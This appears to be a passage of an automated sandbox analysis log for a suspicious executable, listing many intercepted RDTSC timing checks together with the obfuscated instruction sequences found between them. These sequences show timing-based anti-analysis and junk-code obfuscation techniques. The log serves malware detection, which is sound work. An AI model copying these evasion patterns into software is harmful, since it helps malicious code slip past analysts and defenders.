Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0E4 second address: 53D0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D75B second address: 53D770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FA9551579FBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D770 second address: 53D77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FA954E703C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D77D second address: 53D781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D781 second address: 53D787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54082B second address: 540835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA9551579F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5421EC second address: 5421F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5421F2 second address: 5421F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5421F6 second address: 542214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FA954E703C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 push ecx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55565C second address: 555662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 552461 second address: 552467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 552467 second address: 55246B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55246B second address: 552475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 552475 second address: 552479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561ADD second address: 561AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A2F3 second address: 57A30E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA9551579FDh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A30E second address: 57A314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A459 second address: 57A467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A467 second address: 57A46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A46C second address: 57A480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9551579FAh 0x00000009 jnp 00007FA9551579F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A5DB second address: 57A5FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FA954E703D8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A5FB second address: 57A603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A603 second address: 57A607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A607 second address: 57A62A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA955157A05h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FA9551579F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A62A second address: 57A630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57AD37 second address: 57AD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pushad 0x00000008 jmp 00007FA9551579FEh 0x0000000d jg 00007FA9551579F6h 0x00000013 popad 0x00000014 jc 00007FA9551579FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57DCC1 second address: 57DCC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57DCC5 second address: 57DD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FA955157A08h 0x0000000c jmp 00007FA955157A02h 0x00000011 popad 0x00000012 push eax 0x00000013 jnc 00007FA955157A11h 0x00000019 pushad 0x0000001a jmp 00007FA955157A03h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57DFAA second address: 57DFC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57E3F4 second address: 57E3FA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57E3FA second address: 57E401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57E401 second address: 57E414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FA9551579F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57E414 second address: 57E41E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57F574 second address: 57F57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60E5D second address: 4F60EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA954E703CEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov eax, 22C840F3h 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 movzx esi, di 0x0000001c jmp 00007FA954E703D1h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007FA954E703CEh 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FA954E703CAh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60EBB second address: 4F60EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60EBF second address: 4F60EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50E25 second address: 4F50E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FA9551579FCh 0x00000009 pop eax 0x0000000a popad 0x0000000b call 00007FA9551579FBh 0x00000010 mov cx, ECEFh 0x00000014 pop ecx 0x00000015 popad 0x00000016 push ebx 0x00000017 pushad 0x00000018 mov bl, al 0x0000001a popad 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA9551579FEh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50E62 second address: 4F50E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50E71 second address: 4F50EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e push eax 0x0000000f mov di, CB4Ah 0x00000013 pop edi 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA9551579FDh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50EAA second address: 4F50EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA954E703CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F905CB second address: 4F905CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F905CF second address: 4F905EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F905EA second address: 4F905F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F905F0 second address: 4F9065A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA954E703CFh 0x00000013 or si, B2BEh 0x00000018 jmp 00007FA954E703D9h 0x0000001d popfd 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 call 00007FA954E703D9h 0x00000029 mov bx, cx 0x0000002c pop esi 0x0000002d push eax 0x0000002e push edx 0x0000002f mov si, dx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F300A6 second address: 4F300AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F300AC second address: 4F30108 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA954E703D2h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FA954E703CBh 0x0000000f and si, AD9Eh 0x00000014 jmp 00007FA954E703D9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA954E703D3h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30108 second address: 4F30125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30125 second address: 4F3012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3012B second address: 4F3012F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3012F second address: 4F30171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push edi 0x0000000b mov si, A127h 0x0000000f pop eax 0x00000010 mov edi, 277DF540h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FA954E703D0h 0x00000021 sbb esi, 1A005B88h 0x00000027 jmp 00007FA954E703CBh 0x0000002c popfd 0x0000002d movzx esi, di 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30171 second address: 4F301CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d mov dh, al 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA955157A09h 0x00000016 xor ah, 00000006h 0x00000019 jmp 00007FA955157A01h 0x0000001e popfd 0x0000001f mov bx, ax 0x00000022 popad 0x00000023 popad 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F301CB second address: 4F301CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F301CF second address: 4F301D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30263 second address: 4F30269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30269 second address: 4F3026D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3026D second address: 4F3028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA954E703D2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F506A1 second address: 4F506A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F506A7 second address: 4F5071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 2CB3h 0x00000007 pushfd 0x00000008 jmp 00007FA954E703D8h 0x0000000d xor cl, FFFFFFB8h 0x00000010 jmp 00007FA954E703CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007FA954E703D9h 0x0000001f xchg eax, ebp 0x00000020 jmp 00007FA954E703CEh 0x00000025 mov ebp, esp 0x00000027 jmp 00007FA954E703D0h 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5071B second address: 4F5071F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5071F second address: 4F50723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50723 second address: 4F50729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50729 second address: 4F5072E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5041E second address: 4F50424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50424 second address: 4F5042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5042A second address: 4F5042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5042E second address: 4F5044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5044C second address: 4F50452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60161 second address: 4F601A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA954E703CEh 0x0000000f push eax 0x00000010 jmp 00007FA954E703CBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F601A0 second address: 4F601A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F601A4 second address: 4F601A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F601A8 second address: 4F601AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F601AE second address: 4F601B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F601B4 second address: 4F601B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F601B8 second address: 4F601DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA954E703D7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F601DB second address: 4F601E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F601E1 second address: 4F601E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F904FD second address: 4F90503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90503 second address: 4F90554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA954E703CBh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA954E703D4h 0x00000017 sub cx, 1A48h 0x0000001c jmp 00007FA954E703CBh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 movzx eax, dx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90554 second address: 4F9057D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA955157A05h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9057D second address: 4F9058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA954E703CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9058D second address: 4F90591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F701E7 second address: 4F701EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F701EB second address: 4F70227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushfd 0x00000008 jmp 00007FA9551579FFh 0x0000000d xor al, 0000003Eh 0x00000010 jmp 00007FA955157A09h 0x00000015 popfd 0x00000016 pop esi 0x00000017 popad 0x00000018 push ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F505D5 second address: 4F505E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F505E4 second address: 4F50657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 4Ah 0x00000005 pushfd 0x00000006 jmp 00007FA955157A00h 0x0000000b and eax, 62EDF6D8h 0x00000011 jmp 00007FA9551579FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebp 0x0000001d pushad 0x0000001e mov ecx, 3AEF1FABh 0x00000023 mov ecx, 18FE0B87h 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FA955157A08h 0x00000032 or ecx, 7A2FE868h 0x00000038 jmp 00007FA9551579FBh 0x0000003d popfd 0x0000003e movzx esi, di 0x00000041 popad 0x00000042 pop ebp 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50657 second address: 4F5065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5065B second address: 4F50661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60DE7 second address: 4F60DF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60DF6 second address: 4F60E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA955157A04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60E0E second address: 4F60E38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA954E703D5h 0x00000014 rdtsc
